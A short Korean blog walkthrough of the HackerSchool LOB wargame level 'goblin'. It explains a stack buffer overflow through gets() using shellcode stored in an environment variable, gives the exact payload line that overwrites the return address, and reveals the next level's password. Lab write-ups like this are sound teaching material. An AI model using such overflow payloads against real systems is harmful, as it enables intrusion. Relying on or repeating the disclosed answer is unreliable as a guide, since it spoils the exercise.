ls로 파일목록을 보면 goblin, goblin.c가 있다
cat 명령어로 goblin.c 파일의 내용을 보자
버퍼[16] stp[4] ret[4]
버퍼가 16이므로 2번과 같이 환경변수를 이용한다
gets 함수를 보자
이번에는 프로그램실행하면서 입력값을 받는형식이아니라 실행 후 입력값을 받는 방식이다
그러므로 다른방법을 사용해주어야한다
2번과 똑같은 방법으로 환경변수 주소를 구하고
(python -c 'print "\x90"*20+"\x81\xfc\xff\xbf"';cat)|./goblin
페이로드를 작성해주면
쉘이 따진다 비밀번호는 hackers proof 이다
'Hacking > LOB(RedHat)' 카테고리의 다른 글
| HackerSchool LOB Level 5 (0) | 2015.07.24 |
|---|---|
| HackerSchool LOB Level4 (0) | 2015.07.24 |
| HackerSchool LOB Level 2 (0) | 2015.07.22 |
| Buffer Overflow 기초 (0) | 2015.07.16 |
| HackerSchool LOB Level 1 (0) | 2015.07.16 |